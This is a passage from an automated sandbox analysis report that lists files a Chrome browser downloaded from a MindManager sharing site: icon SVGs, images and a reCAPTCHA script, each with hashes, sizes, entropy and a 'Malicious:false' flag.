                                                                SHA-512:57B7887CAA7440963F9AC9CCE8FEF21703205ADACC38A38525ACBB53B5A8370357FA37A9C26E7EF75E131D54AE6ED7BD9FEDFCD3951C36F0B88C1998FACA85D7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/google-drive.svg
                                                                Preview:<svg viewBox="0 0 139 120.4" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><radialGradient id="a" cx="-254.81979" cy="705.83588" gradientTransform="matrix(2.827 1.6322 -1.6322 2.827 2092.1199 -1494.5786)" gradientUnits="userSpaceOnUse" r="82.978401"><stop offset="0" stop-color="#4387fd"/><stop offset=".65" stop-color="#3078f0"/><stop offset=".9099" stop-color="#2b72ea"/><stop offset="1" stop-color="#286ee6"/></radialGradient><radialGradient id="b" cx="-254.8174" cy="705.83691" gradientTransform="matrix(2.827 1.6322 -1.6322 2.827 2092.1199 -1494.5786)" gradientUnits="userSpaceOnUse" r="82.973"><stop offset="0" stop-color="#ffd24d"/><stop offset="1" stop-color="#f6c338"/></radialGradient><path d="m24.2 120.4-24.2-41.9 45.3-78.5 24.2 41.9z" fill="#0da960"/><path d="m24.2 120.4 24.2-41.9h90.6l-24.2 41.9z" fill="url(#a)"/><path d="m139 78.5h-48.4l-45.3-78.5h48.4z" fill="url(#b)"/><path d="m69.5 78.5h-21.1l10.5-18.3-34.7 60.2z" fill="#2d6fdd"/><path d="m90.6 7
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):247
                                                                Entropy (8bit):4.7462535557414025
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4BC3A11375E64EF7C5DFD542E8F266EA
                                                                SHA1:07BE950915887BB15C38722A2D4B98D32D764815
                                                                SHA-256:86A8F5FBE19908B5E00E796E45BEF8680F1FAAB4A062CEB85499FDBF25E2086B
                                                                SHA-512:CDC6AA7AAD215B51DC227D03BC6F62A7F906ECDEDC11DA6EB849C446427D2759851539F1F6D418BDFACADC389F143EC4FF08C559F182DDF9A7125C95F45415C2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/triple-dot-action.svg
                                                                Preview:<svg width="12" height="4" viewBox="0 0 12 4" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="1.5" cy="2" r="1.5" fill="#000B36"/>.<circle cx="6" cy="2" r="1.5" fill="#000B36"/>.<circle cx="10.5" cy="2" r="1.5" fill="#000B36"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):952
                                                                Entropy (8bit):5.144783603524809
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DF2C6AF0643AF0DBBDCCAAA921F4E000
                                                                SHA1:439F1381BFC17A6FDCC35015AAA00033E3B0E589
                                                                SHA-256:F4232E1E3C6442D89B2A6B9826FD235A067BA6EE6A801D30CB8CEFEDCBF45C60
                                                                SHA-512:A831F524C1A9B5A141BAC4066C904C05D7AB0E0584BE017AABFA32D831EBE04DB94B264BD8F1D45759812FC8E540E06D417A5A1202224E207150BE5889CBA12D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/file-icon.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25 29"><defs><style>.cls-1{fill:#3f5ab5;}.cls-2{fill:#fff;}.cls-3{fill:#a1a2a5;}.cls-4{fill:#d1d2d4;}</style></defs><title>filebrowser-file</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M21.31,29H3.69A3.63,3.63,0,0,1,0,25.45V3.56A3.64,3.64,0,0,1,3.69,0H17.92L25,6.79V25.45A3.63,3.63,0,0,1,21.31,29Z"/><polygon class="cls-2" points="19 6 19 2.43 22.55 6 19 6"/><path class="cls-2" d="M20,4.86l.14.14H20V4.86M18,0V7h7L18,0Z"/><polygon class="cls-2" points="9.09 24.19 12.61 15.46 9.94 10 5.08 10 5.08 24.19 9.09 24.19"/><path class="cls-3" d="M13.2,23.35l.38,0,.1,0,.39.05.08,0,.4.08,0,0,.42.11h0l.42.14h0l.41.16,0,0,.38.17-3.75-8-3.75,8h0L9.24,24h0l.43-.17h0l.42-.14h0l.42-.11,0,0,.41-.08.07,0,.4-.05.09,0,.4,0h.1l.5,0,.5,0h.11"/><polygon class="cls-4" points="15.97 24.19 12.4 15.46 15.06 10 19.97 10 19.97 24.19 15.97 24.19"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):947
                                                                Entropy (8bit):4.5961948966478685
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2CDA7A9B7B9C2F7AE6763F9BEB0438D3
                                                                SHA1:54588B91148879F2D7F1C861FF4ED5BCBAE873FC
                                                                SHA-256:99B3D0E1E92ADC145CA17C2C91E858F56EA9A9E3E12C2F29DEDB97F16CACB39C
                                                                SHA-512:B1F3FCC7B5DB1C7982012ED16DA587140CD6A6E2101B76A3A38D9A2ACE99BD8AF3BBA62A64DACD66DD9B17262619676553D8CADFC641B724D12722381EFF4892
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/pen.svg
                                                                Preview:<svg width="17" height="16" viewBox="0 0 17 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M12.1972 0.979454C12.3925 0.784192 12.7091 0.784192 12.9043 0.979454L15.571 3.64612C15.7663 3.84138 15.7663 4.15797 15.571 4.35323C15.3757 4.54849 15.0592 4.54849 14.8639 4.35323L12.1972 1.68656C12.002 1.4913 12.002 1.17472 12.1972 0.979454Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M10.1979 2.97945C10.3932 2.78419 10.7097 2.78419 10.905 2.97945L13.5717 5.64612C13.7669 5.84138 13.7669 6.15797 13.5717 6.35323L5.905 14.0199C5.84347 14.0814 5.76695 14.1258 5.683 14.1487L2.01634 15.1487C1.84323 15.1959 1.6581 15.1468 1.53122 15.0199C1.40435 14.893 1.35518 14.7079 1.4024 14.5348L2.4024 10.8681C2.42529 10.7842 2.4697 10.7076 2.53122 10.6461L10.1979 2.97945ZM3.33222 11.2593L2.59739 13.9537L5.29178 13.2189L12.511 5.99967L10.5514 4.04011L3.33222 11.2593Z" fill="black"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):734
                                                                Entropy (8bit):5.018852773370508
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FE49788E86DDA7BB66371A70B66B1D3F
                                                                SHA1:FF596248067B2094F9EC93113C21C6134DDD9482
                                                                SHA-256:1148056C32EBC84ED892758DE9205A093FCCD179F05280F053C93239C156CA54
                                                                SHA-512:440AA0DB825C1B05AF7E154698554A1D13EDD83B4F8A3D3893EA3A9A07BCABCF881A59CF12703137A8FFB4519262A70D1697DA510E11DB3585FA8FDEF1D6B0E1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/book.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#0573af;}.cls-2{fill:#ccc;}.cls-3{fill:#1c97e6;}.cls-4{fill:#b3b3b3;}.cls-5{fill:#fbb400;}</style></defs><title>book_2_16</title><circle class="cls-1" cx="2.5" cy="1.5" r="1.5"/><circle class="cls-1" cx="2.5" cy="14.5" r="1.5"/><rect class="cls-1" x="3" width="12" height="15"/><rect class="cls-2" x="3" y="1" width="11" height="14"/><rect class="cls-3" x="3" y="2" width="12" height="14"/><rect class="cls-4" x="2" y="1" width="12" height="0.5" transform="translate(16 2.5) rotate(-180)"/><rect class="cls-1" x="1" y="1" width="2" height="14"/><polygon class="cls-5" points="14 8 12 6.5 10 8 10 2 14 2 14 8"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 59 x 43, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1064
                                                                Entropy (8bit):7.6978806390077255
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1704CAEA26F37958D920EF7E4C1C5D08
                                                                SHA1:EFA2BE011E642E3CC2D16D780042F2B5B5297515
                                                                SHA-256:2E7E75A181FF416F79ED09D0A1B9235FBB08474A0A782433FB249F07C53A0B7A
                                                                SHA-512:2B8B052C594058AF34FEF9F8017EB47789D73DE2E3240B12DA3EC1277375409473358231134D6EC4DF885CC167DCBE757CABF3937C54F9399E0062289D13E47D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-diamond.png
                                                                Preview:.PNG........IHDR...;...+........(....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx...k.A..G......`.'!PP........B..'..._...^...x.B?.SA.).....P(T<....(.j.I.{.*[......`c....o.73o..z=".H.R.i.........;...zuu.......D`.....f......-..CNNN.......{a`.t.^2n..$.I..z....)...2.L?...\....ii.......N.s....1)..4.p.78.)@..;X....7p.c..)...<..n.j.J3...x..ks.........}........Z.F...t./y1...G .*J.3...u}.....7.M..?./....3.....I..TBF.R..-......U...@y.r9.m..plM*..`QBp._[.V...........C&.2.kTBF..U(.z...I..V.P.$t.....y..P../YHhRy....7|]..4...}i.......L$.H^...."/UX.MB.y...Mv......\....f]...fk^\\$..5.V................R.............{..H$..l...W6....I^.Q....\B.M..z1..*..,JH.R.....<C...Z./.....".y....;......ei.Z.l...vk&.!.`..{..u..h4...3h.............1l..-......Zz_.g..)+......f..JrR.gu.?...e.4..<..&......X.qZ.C.\...U...........,.Z....J..*...$5(...V.d..EQE7.;.,...tDI.+,.y.%.#..n..f...z.gby...2..`.+.....YW4...l1.(!^;.\.g..N..0...BB.a.....D"aZ]]....h.(.....T....G.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1565
                                                                Entropy (8bit):5.223299368916479
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B38F36BF2AC0FDE692239045E2EF5301
                                                                SHA1:47F941F13704A9594681FBD9FC9E032FA2B3C2F2
                                                                SHA-256:9E016E62A37A57A98B2FB2ACF27B2486025ADB8849D0498F6CD66D21C818457D
                                                                SHA-512:6499A533740E1101524654FB08AB7CCC932FA1AD5B0E4D4038E7DC1578E8C36CEE5C3779F43E82F09F1A3F2015FB436E17531ECBAFF7E3E25BF8CE0715C0A08D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18"><defs><style>.cls-1,.cls-2{fill:#fff;}.cls-1{stroke:#fff;}.cls-1,.cls-6,.cls-7{stroke-miterlimit:10;}.cls-3{fill:#c8c8c8;}.cls-4{fill:#528cc9;}.cls-5{fill:gray;}.cls-6{fill:#80b6e2;stroke:#528cc9;}.cls-7{fill:#edc26e;stroke:#b4853a;}</style></defs><title>control_strip_Notes_1</title><polygon class="cls-1" points="12.04 15.96 17.5 10.5 15.47 6.2 7.7 13.97 7.5 16.5 12.04 15.96"/><polygon class="cls-1" points="12.5 16.5 1.5 16.5 1.5 1.5 10 1.5 12.5 4 12.5 16.5"/><path class="cls-2" d="M12,13.42V7.36L7.79,3H4.14A1.19,1.19,0,0,0,3,4.23v9.54A1.19,1.19,0,0,0,4.14,15H9.5Z"/><rect class="cls-3" x="4" y="10" width="5" height="1" rx="0.29"/><rect class="cls-3" x="4" y="12" width="4" height="1" rx="0.29"/><rect class="cls-4" x="4" y="6" width="3" height="1" rx="0.29"/><rect class="cls-4" x="4" y="8" width="2" height="1" rx="0.29"/><polygon class="cls-5" points="8 2.19 8 6 11.81 6 8 2.19"/><polygon class="c
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1600x488, components 3
                                                                Category:dropped
                                                                Size (bytes):40230
                                                                Entropy (8bit):7.214109231484545
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:62C1E47B798468469B38FA41BDCF6AF6
                                                                SHA1:7ABDFC785861CBE22B701D1F0A5C25E7596D073A
                                                                SHA-256:ECB69E0B380B4EC3D5570287EC713B8CD289E3968B5FD870F757E7E96B1DC696
                                                                SHA-512:AC1759CF49CA1C3FA29233AA96FDA1C0261F6B09FCD0E2CCFA42C75949A92CC6506F672A44AFCE082D4513E629AF4947DE65AE5541E7C3A73ABE477015822960
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......JFIF.....,.,.....C....................................................................C.........................................................................@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1112
                                                                Entropy (8bit):4.888442701027754
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:77DFF817BCE3D1D4B10458998C3AEB93
                                                                SHA1:F160966C188D85EDF1EE1BFEB05B45649A5449BE
                                                                SHA-256:EBF82C38ABD62DC42EF895DB56EF52EFE623DED20087D62A9EA42FE6EFD8EC1B
                                                                SHA-512:51DC4C47B92F942BC28F047D444EAF6050FEB55522193339817CD0918744BBD8F138D856886E38175DFB5F97CE58C7D749373D833636E955EB925E0F79578157
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/overlay-panel/status-co-editing-on.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18.82 16.85"><defs><style>.cls-1{fill:#29a535;}.cls-2{fill:#d0f4d0;}.cls-3{fill:#fff;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M18.07,9.28a.2.2,0,0,0-.33,0L14.17,14a.2.2,0,0,1-.34,0L12.27,11.9a.21.21,0,0,0-.17-.1.2.2,0,0,0-.17.1l-.69.82a.39.39,0,0,0-.07.23.37.37,0,0,0,.07.23l1.57,2.21c.1.12.25.33.34.45l.68.91a.2.2,0,0,0,.34,0l4.58-6.1a.39.39,0,0,0,0-.46Z"/><circle class="cls-2" cx="11.5" cy="3.5" r="3"/><path class="cls-1" d="M11.5,1A2.5,2.5,0,1,1,9,3.5,2.5,2.5,0,0,1,11.5,1m0-1A3.5,3.5,0,1,0,15,3.5,3.5,3.5,0,0,0,11.5,0Z"/><path class="cls-1" d="M10,15H5.29c.24-5.56,2.18-7.56,5.9-7.56A5.37,5.37,0,0,1,14.84,9h1.25c-1.46-1.84-2.82-3-4.9-3C6.61,6,4,9.05,4,15.7V16h6Z"/><circle class="cls-3" cx="3.5" cy="3.5" r="2"/><path class="cls-1" d="M3.5,2A1.5,1.5,0,1,1,2,3.5,1.5,1.5,0,0,1,3.5,2m0-1A2.5,2.5,0,1,0,6,3.5,2.5,2.5,0,0,0,3.5,1Z"/><path class="cls-1" d="M1.38,9c0-2.34.8
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):78582
                                                                Entropy (8bit):4.129047493784915
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CD1A8F865EE4E703F8599CCD7CBE6597
                                                                SHA1:22565158467F406EAB64BA9B0EB71992B201F034
                                                                SHA-256:57B2BF177B3C262BF24AC1A0BD21CF319F070A5626666F92786BEB47DD76E750
                                                                SHA-512:9573ACCF76B99333B03C8172EA5276FE53EAD052113C2A707CC6E97604654D1460746EF6DD86E4C626065EADD3F1D600A8CD596D2E3AE5CC03DE3DE3C73943F3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_education.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_3473)">..<rect width="200" height="250" rx="10" fill="#FFF3DC"/>..<path d="M170.062 170.805C181.791 154.925 183.523 133.935 176.702 115.871C169.881 97.8072 155.153 82.6526 137.409 72.2455C114.266 58.6718 84.6072 52.8667 58.3631 60.5829C32.119 68.2992 10.9612 91.0226 11.2077 115.907C11.3262 127.866 17.0884 140.608 28.8774 146.098C40.2396 151.389 54.5294 148.97 65.9878 154.092C86.5164 163.268 90.2818 190.487 114.843 195.168C134.332 198.882 159.742 184.778 170.062 170.805Z" fill="#F8E3BC"/>..<path d="M39.8 190.477H124.93L124.93 72.8999L39.8 72.8999L39.8 190.477Z" fill="white" fill-opacity="0.35"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M125.604 190.477C125.604 190.85 125.302 191.152 124.93 191.152H39.7999C39.4272 191.152 39.125 190.85 39.125 190.477L39.125 72.9008C39.125 72.528 39.4272 72.2259 39.7999 72.2259L124.93 72.2259C125.302 72.2259 125.604 72
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (636)
                                                                Category:downloaded
                                                                Size (bytes):507402
                                                                Entropy (8bit):5.716931017016813
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D82420D1FA2614B38577F41CC926C982
                                                                SHA1:17BB348C7A74C60C3BE698FDD4FA942068F591BF
                                                                SHA-256:63012AF2F6B47E6910C89D997015E475FEE6E343AC5B8121468292E0B1E91508
                                                                SHA-512:97403E5A68346DBD1BEBF956161A67C115FFED479C11C781DE2CF973A19D7EA24F63AFB16E102D1770E51C053B5BD720F61A7D77D47804A4009FB9508CD25D55
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
                                                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):805
                                                                Entropy (8bit):4.760944831374432
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4646F7AC2EC15A1930FC71F121FBB101
                                                                SHA1:6EB51E5C0450A5FFF3C169CA1DFEAB517703DD7B
                                                                SHA-256:509E32DC313F3EDAD0A9D6AC6671159397334971AC374E79E251C8A8E8B47F54
                                                                SHA-512:8F5AA27D402C6411355EC09EC687F08321F25A9BD0E621C934A7FD3516A20D0F2AC8C33395B1FD5A22A0ECAA86FC01E956E1E4839098D3AA132CAC8B217621D4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/smiley-sad.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#f9cd75;}.cls-3{fill:#333;}</style></defs><title>emoji_9_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><rect class="cls-2" x="5" y="11" width="6" height="2"/><rect class="cls-2" x="11" y="12" width="1" height="2"/><rect class="cls-2" x="4" y="12" width="1" height="2"/><rect class="cls-3" x="5" y="10" width="6" height="2"/><rect class="cls-3" x="11" y="11" width="1" height="2"/><rect class="cls-3" x="4" y="11" width="1" height="2"/><rect class="cls-3" x="4" y="5" width="2" height="3"/><rect class="cls-3" x="10" y="5" width="2" height="3"/><rect class="cls-2" x="4" y="8" width="2" height="1"/><rect class="cls-2" x="10" y="8" width="2" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 70 x 50, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1049
                                                                Entropy (8bit):7.734376720781725
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EA5FD1F090084ABD09200A421756AF2D
                                                                SHA1:704CB6F0B16C077C70B1890B1E97237674036457
                                                                SHA-256:F71CBC514045CE594B7791699E14242FB52034B31E74293DBDD52BEF11CBF4CA
                                                                SHA-512:F18223FE18F0BB9D4DD97588DF198F68DB01B46D87D1C2C8E8D59272F9C0616CC2F1E08B4A85053DBB5500BE4055C328B7A0C7F49A794BB3161A15370812069A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-add-image.png
                                                                Preview:.PNG........IHDR...F...2......S....bKGD..............pHYs.........B(.x....tIME.....28..)Z....IDATh.._h[U..?.{.D.l.mo."+..n.?...2p.|...|....E.ue....@e0.. .....1...Q.....)[s..:.-.jz.=>..m.K.....~...9.9..9...D..)R.$..-%p.........F.&.....f.e...0...rG.e7V..........*F.A.....L...u.A.c.Q.d.9....A......!j.#?..'..T..........N0...*7O..,.....w.~O8.(~.s._...<w....;.x8..q......]<..^.:............J.....T.U.0..KA.|5_f.7&.....*#.....X........4.{....._..4....&x...QS...R:....>.P...^.c..?.-.O.f.*..s.P.[..ar./.y.6K{.)\.....b/CJo_0.}'..5H.e._G....L%...x.Y.e...}.J.M..)<...@..".O..c2.s(...9C.(m..gFp...GP....@....n*...i{S..(.,..^...d.../.2.gP2Q.4...3..Tu..c.$..@=...........%./.=ONa..U....r.].....6.7....Xg...<..]`.!<m;..........).....7.X..u_...q..X....h.I..0...+...s....`%.....cL{..o.._...X.i..]...../.d.9...1......\b.,....X.;_..366..UZ...R.....1n|.3.R...~...z.l)..0Nq..Dk(....TJ..C..-....]....7.1.|..>...\..q...J...........~..0.=.<D.J..W..u............?.o..-.~..;h.d...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1380
                                                                Entropy (8bit):4.489735980605326
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A66CF8E36D92E423B4C680DFE1949BD8
                                                                SHA1:07E925777A9621B695797B50BA6D52D08619237F
                                                                SHA-256:00767E4C59BC34F48E25B480831422BC2BCD1281D18EFF18856CF43D766F0252
                                                                SHA-512:F25DDD0D163CA76918B2B2C0A2697F7A860B8B525F4896AF7C043562C7351AEE6167770F407FEC12D281375FA2E33501CC401A465A88FBCA73B87BB663264F47
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority02.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#00a6ff;}.cls-2{fill:#0f77b2;}.cls-3{fill:#fff;}</style></defs><title>priority02</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.4,13a6.14,6.14,0,0,1-.11-1,3.87,3.87,0,0,1,.31-1.53,3.65,3.65,0,0,1,.76-1.16,10.61,10.61,0,0,1,1-.87c.36-.27.69-.51,1-.7a4,4,0,0,0,.76-.61,1,1,0,0,0,.3-.65.84.84,0,0,0-.3-.7,1.16,1.16,0,0,0-.72-.24,1.27,1.27,0,0,0-.82.29,2.31,2.31,0,0,0-.6.72L5.24,5.36A4,4,0,0,1,6.55,3.88,3.6,3.6,0,0,1,8.6,3.31a3.63,3.63,0,0,1,2.28.75,2.58,2.58,0,0,1,1,2.17,2.86,2.86,0,0,1-.4,1.5,3.66,3.66,0,0,1-1,1.12,11.65,11.65,0,0,1-1.15.78,11.42,11.42,0,0,0-1,.7,1,1,0,0,0-.45.67H12v2Z"/><path class="cls-3" d="M4.4,12a6.14,6.14,0,0,1-.11-1A3.87,3.87,0,0,1,4.6,9.44a3.65,3.65,0,0,1,.76-1.16,10.61,10.61,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):449
                                                                Entropy (8bit):5.212844162762644
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:54F9BD480E11BD8F9BD606AB4235C700
                                                                SHA1:3F8D2F38AB0FDCEC4050198B33975DDDCCCE257C
                                                                SHA-256:946CFBBF20EA3C247B1110D7370099D3D2DF7249027BF35970AC030937B65262
                                                                SHA-512:2B92D41DA707107A5EAE142440BBF7F0AA8609A7926FD15D3DF916CC15FBBEDDBF7AB1CDA0ACCEF95AB1E94481297D4251A5F3455287ED64739C8482EC0C4537
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/check.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;stroke:#32d140;stroke-miterlimit:10;stroke-width:2px;}</style></defs><title>Checkmark_16</title><path class="cls-1" d="M1.16,7.92l3.27,5.24a.64.64,0,0,0,1.06.1l9.27-8.63c.49-.57.18-1.63-.49-1.63H14.1a.63.63,0,0,0-.48.24L5.51,10.53a.65.65,0,0,1-1.08-.12L2.31,6.78a.69.69,0,0,0-.58-.37h0C1.12,6.41.78,7.31,1.16,7.92Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):877
                                                                Entropy (8bit):5.354264787596216
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7C804DFB4ECB9396AE09B718C8B81EC8
                                                                SHA1:0A89B25593D77CE8FAB625FBC9B34A217251A023
                                                                SHA-256:00C7347AE455C447D3B5D4999495816950BC9AF300B965E585DFFADE2AF63372
                                                                SHA-512:DB252F1A3CE208CC350B1F220ABAC72B688D66ABF358486D09E0A81AACECCC1DDEE477ACC0A1F6B8188592CB5A803EC80971BBF4384F47364DF0DE571C98E56B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/Icons/unsupported-feature.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="16px" height="16px" viewBox="0 0 16 16" style="enable-background:new 0 0 16 16;" xml:space="preserve">.<style type="text/css">...st0{fill:#CF2027;}...st1{fill:#FFFFFF;}.</style>.<g>..<path class="st0" d="M15.3,0H0.7C0.3,0,0,0.3,0,0.7v14.6C0,15.7,0.3,16,0.7,16h14.6c0.4,0,0.7-0.3,0.7-0.7V0.7...C16,0.3,15.7,0,15.3,0z"/>..<g>...<path class="st1" d="M10.1,11.9H8.8V6.5c0-0.5-0.4-0.8-0.8-0.8H5.9c-0.5,0-0.8,0.4-0.8,0.8c0,0.5,0.4,0.8,0.8,0.8h1.2v4.5H5.9....c-0.5,0-0.8,0.4-0.8,0.8s0.4,0.8,0.8,0.8h4.1c0.5,0,0.8-0.4,0.8-0.8S10.5,11.9,10.1,11.9z"/>...<circle class="st1" cx="8" cy="3.4" r="1.4"/>..</g>.</g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):951
                                                                Entropy (8bit):5.025434438554224
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2FF29F72F90D7FA8A0F1B6EF9DC4A0B9
                                                                SHA1:789AFE5E36F758FF1BAD0A0F000859A1D79550CC
                                                                SHA-256:2A3E6F2F6F92A1029C6492330ABFA39D873AE6DDCF12CB8F67DDFEE22F109F74
